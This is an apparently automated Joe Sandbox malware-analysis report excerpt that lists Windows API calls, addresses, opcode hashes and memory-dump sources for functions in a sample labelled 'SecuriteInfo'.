                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                        • String ID:
                                                                        • API String ID: 3495660284-0
                                                                        • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                        • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                                                        • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                        • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                                                        APIs
                                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Virtual
                                                                        • String ID:
                                                                        • API String ID: 4278518827-0
                                                                        • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                        • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                                                        • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                        • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                                                        APIs
                                                                        • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                          • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                          • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                        • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                          • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                        • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                        • ExitThread.KERNEL32 ref: 004151ED
                                                                        • __freefls@4.LIBCMT ref: 00415209
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                        • String ID:
                                                                        • API String ID: 442100245-0
                                                                        • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                        • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                                                        • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                        • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                                                        APIs
                                                                          • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                          • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                        • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                                                        • _wcslen.LIBCMT ref: 0045F94A
                                                                        • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                        • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                                                        • String ID: 0
                                                                        • API String ID: 621800784-4108050209
                                                                        • Opcode ID: a44a9b3346c6bb8aee0ad9873ab8e4bb0a101d6bd4856354047c9bdc96e9273a
                                                                        • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                                                        • Opcode Fuzzy Hash: a44a9b3346c6bb8aee0ad9873ab8e4bb0a101d6bd4856354047c9bdc96e9273a
                                                                        • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                                                        APIs
                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                        • SetErrorMode.KERNEL32 ref: 004781CE
                                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                                                          • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                        • SetErrorMode.KERNEL32(?), ref: 00478270
                                                                        • SetErrorMode.KERNEL32(?), ref: 00478340
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                                                        • String ID: \VH
                                                                        • API String ID: 3884216118-234962358
                                                                        • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                        • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                                                        • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                        • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                                                        • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                                                        • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Library$AddressFreeLoadProc
                                                                        • String ID: AU3_GetPluginDetails$#v
                                                                        • API String ID: 145871493-3662034293
                                                                        • Opcode ID: 159cfda42166365942fc35f4e8310eed724addc4652cab969a8521ebf27062eb
                                                                        • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                                                        • Opcode Fuzzy Hash: 159cfda42166365942fc35f4e8310eed724addc4652cab969a8521ebf27062eb
                                                                        • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                                                                        APIs
                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                                                        • IsMenu.USER32(?), ref: 0044854D
                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                                                        • DrawMenuBar.USER32 ref: 004485AF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$Item$DrawInfoInsert
                                                                        • String ID: 0
                                                                        • API String ID: 3076010158-4108050209
                                                                        • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                        • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                                                        • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                        • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                                                        APIs
                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                                                        • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$_memmove_wcslen
                                                                        • String ID: ComboBox$ListBox
                                                                        • API String ID: 1589278365-1403004172
                                                                        • Opcode ID: 0014777097789b8f84f3fe106d7e17ae724925b3d4bce213ca40c56104f0711f
                                                                        • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                                                        • Opcode Fuzzy Hash: 0014777097789b8f84f3fe106d7e17ae724925b3d4bce213ca40c56104f0711f
                                                                        • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Handle
                                                                        • String ID: nul
                                                                        • API String ID: 2519475695-2873401336
                                                                        • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                        • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                                                        • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                        • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                                                        APIs
                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Handle
                                                                        • String ID: nul
                                                                        • API String ID: 2519475695-2873401336
                                                                        • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                        • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                                                        • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                        • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                                                        APIs
                                                                        • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                        • _wcsncpy.LIBCMT ref: 00401C41
                                                                        • _wcscpy.LIBCMT ref: 00401C5D
                                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                                                        • String ID: Line:
                                                                        • API String ID: 1874344091-1585850449
                                                                        • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                        • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                                                        • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                        • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: SysAnimate32
                                                                        • API String ID: 0-1011021900
                                                                        • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                        • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                                                        • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                        • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                                                        APIs
                                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                          • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                          • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                          • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                          • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                        • GetFocus.USER32 ref: 0046157B
                                                                          • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                                                          • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                                                        • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                                                        • __swprintf.LIBCMT ref: 00461608
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                                                        • String ID: %s%d
                                                                        • API String ID: 2645982514-1110647743
                                                                        • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                        • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                                                        • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                        • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                        • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                                                        • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                        • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                                                        APIs
                                                                        • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
